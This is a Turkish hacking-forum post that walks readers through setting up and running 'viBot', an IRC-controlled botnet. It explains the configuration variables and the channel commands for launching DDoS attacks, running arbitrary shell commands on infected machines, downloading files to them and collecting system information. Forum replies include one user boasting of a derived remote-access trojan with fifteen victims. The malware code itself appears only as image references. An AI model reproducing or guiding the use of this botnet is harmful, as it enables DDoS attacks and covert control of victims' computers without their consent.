IRC Tabanlı Modüler Botnet - Portsuz

b0mb

Katılımcı Üye
14 Mar 2017
471
1
İzmir
IRC Tabanlı Modüler Botnet

Merhaba arkadaşlar,

Botnet deyince, bir çok kişinin aklına "bir çok bilgisayar ile bir hedefe DDoS saldırısı yapmak için yazılan yazılım" geliyor. Bu amaçla kullanılabilecek olsa da, eksik bir tanımdır. Türkçe karşılığına "Robot ağı" diyebiliriz. Çok sayıda makineye / bota eş zamanlı komut verip, çalıştırabilme gücü verir size botnetler.

Haberleşme olayı için IRC sunucuları kullanıldı. Bu sayede port yönlendirmesi olmadan yönetici ve client(ler) arasında veri aktarımı yapabiliyoruz.

IRC: https://tr.wikipedia.org/wiki/IRC
Botnet: https://tr.wikipedia.org/wiki/Botnet

GitHub: https://github.com/blackvkng/viBot

Clientin Ayarlanması

Programı kullanmadan önce, IRC hakkında biraz bilginizin olması gerekiyor. Yukarıda verdiğim link ve biraz ek araştırma ile çözebilirsiniz olayı, çok zor değil.

Programda değiştirmeniz gereken değişkenler,

VMa0rq.png

Ben Sunucu olarak Freenode kullandım.
"SERVER" değişkenin aldığı değere bakarsanız, Freenode kullandığımı görürsünüz. İsterseniz bu değeri değiştirebilirsiniz.
"TARGET" değişkenini değiştirmemelisiniz, programda bulunan dos modülünün sağlıklı çalışabilmesi için default olarak o değer atandı.
"CHNL" değişkenine, botun ve bizim Freenode üzerinden giriş yapacağımız kanalı atadık. Bunu kendi istediğiniz bir isimle değiştirebilirsiniz.
"PORT" değişkeni, yine dokunmamanız gereken bir değişken.(IRC Default Port)
"BASE" değişkeni, çok önemli bir değişken. Bu emir alacağı kişinin nicki. Bu değişkene istediğiniz değeri verdikten sonra kanala giriş yapmadan önce "/nick <önceden belirlenen nick>" şeklinde sunucuya kullanmak istediğiniz nicki belirtmelisiniz. Aksi takdirde botları kontrol edemezsiniz.
"NICK" değişkeni, kanala girecek olan botun nicki oluyor. Burada "getpass.getuser()" kullanarak, botun bulunduğu bilgisayarın kullanıcı adını kullanarak kanala giriş yapmasını sağlayabilirsiniz ki bunu tavsiye ederim.

Artık kullanıma hazır, herhangi ek bir kütüphaneye gerek yok, program tamamen standart kütüphaneler kullanılarak yazıldı. Şimdi botu çalıştırıp, IRC client aracılığı ile kanala bağlanıp botlarımızı kontrol edelim.

ASCIINEMA: https://asciinema.org/a/126356
4MrzOG.png

Kanala girişi göstermek için, böyle bir kayıt aldım. Çok daha açıklayıcı olacağını umuyorum yazılı anlatımdan. Ben IRC client olarak "irssi" kullanıyorum, siz HexChat(GUI), weechat vs. kullanabilirsiniz. Hiç olmadı, kiwiirc.com üzerinden botları kontrol edebilirsiniz. Bu arada, Android üzerine bir IRC client kurarsanız botları Android üzerinden de kontrol edebilirsiniz! :)

Kullanım / Özellikler - Modüller

IRC kanalına girdikten sonra, bulunan modüllerin kullanımı şu şekildedir,

#viBotChannel --> [modül] [argümanlar]​

Önce kullanılacak modül adı sonra da modüle gönderilecek argümanları belirtiyoruz.

Sahip Olduğu Modüller

Dos modülü

Bu modül, belirlediğiniz bir hedefe, kanalda bulunan tüm botlar ile DDoS saldırısı başlatır.

Kullanımı
#viBotChannel: dos set target Google
#viBotChannel: dos start​

Execute modülü

Bu modül, botların bulunduğu bilgisayarda argüman olarak verdiğiniz komutu çalıştırır ve çıktısını size gönderir.

Kullanımı
#viBotChannel: execute ls -la /usr/bin
Popup modülü

Bu modül, argüman olarak verdiğiniz mesajı, botun ekranında gösterir.

Kullanımı
#viBotChannel: popup test message to channel!
Wget modülü

Bu modül, URL’sini verdiğiniz dosyayı belirlediğiniz isimde botun bilgisayarına indirir.

Kullanımı
#viBotChannel: wget Client Validation test.jpg
Info modülü

Bu modül, botun çalıştığı sistem hakkında bilgi verir.

Kullanımı
#viBotChannel: info
Python biliyorsanız, kendiniz de ekleyebilirsiniz modül. Bir de nasıl modül ekleyebileceğimize bakalım.

Nasıl yeni modüller ekleyebilirim?

Kolay bir şekilde kendi yazdığınız modülleri programa ekleyebilirsiniz. Size anlatmak amacı ile programın "info" modülünü yazalım. Bu modül, bize botun çalıştığı bilgisayar hakkında bilgi verecek. Aşağıda modülün kodları yer alıyor. Bilgisayarın bilgilerini bir liste olarak döndüren bir "run" fonksiyonu var.

ZEkXqZ.png

Modülü yazdığımıza göre hemen ana scriptimiz olan "viBot" scriptine import edip gerekli düzenlemeleri yapalım.

from modules import info
Satırı ile ana scripte aktardık modülü.

WQkq38.png

Şimdi, eğer "BASE" değişkenine atadığımız nickin sahibinden gelen mesajın ilk kelimesi "info" ise yani yöneticinin çalıştırmak istediği modül "info" modülüyse ve gelen mesej "priv" yani sadece bana geldiyse, "sysinfo" değişkeninin değerini, "info.run()" fonksiyonunun döndürdüğü değere eşitle. Arıdan, bu değişkeni yöneticiye gönder.

Modül hazır, hemen test edelim.

ok3XvR.png

Modülümüz görevini yerine getirdi, sorunsuz çalışıyor.

Ekran Görüntüleri - Video

Dos Modülü
ZEkX4o.png

Info Modülü
ok3XvR.png

Wget Modülü
lWjqlg.png

Popup Modülü
VMa9dj.png

Execute Modülü
nWMQnB.png

[ame="https://www.youtube.com/watch?v=IqwJdVBoxsA"]youtube[/ame]
Hızlandırarak izlemenizi öneririm.

Takıldığınız bir yer olursa, bilgim neticesinde yardımcı olmaya çalışırım.

Son düzenleme:

KurokoTetsuya

Kadim Üye
23 Nis 2015
5,028
2
SGA
Eline sağlık Ömer, benim projeyi yapmayı düşünüyorum ben de :D
Hani bir çeşit botnet vardı ya ;)
Tabi python öğrenirsem :)

Ayberk25

Katılımcı Üye
21 Nis 2016
436
9
c:/
Pythonda bilgim var ama botnetde yok bu komutları verebilmek için clientin açık olması lazım demi :D

Socialmm

Katılımcı Üye
8 Ocak 2017
854
1
ben bunu gelistirip c# de rat yaptim baya gelismisdi 15 kurban attim banliyolar veri transferi cok olunca haberiniz olsun :)

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.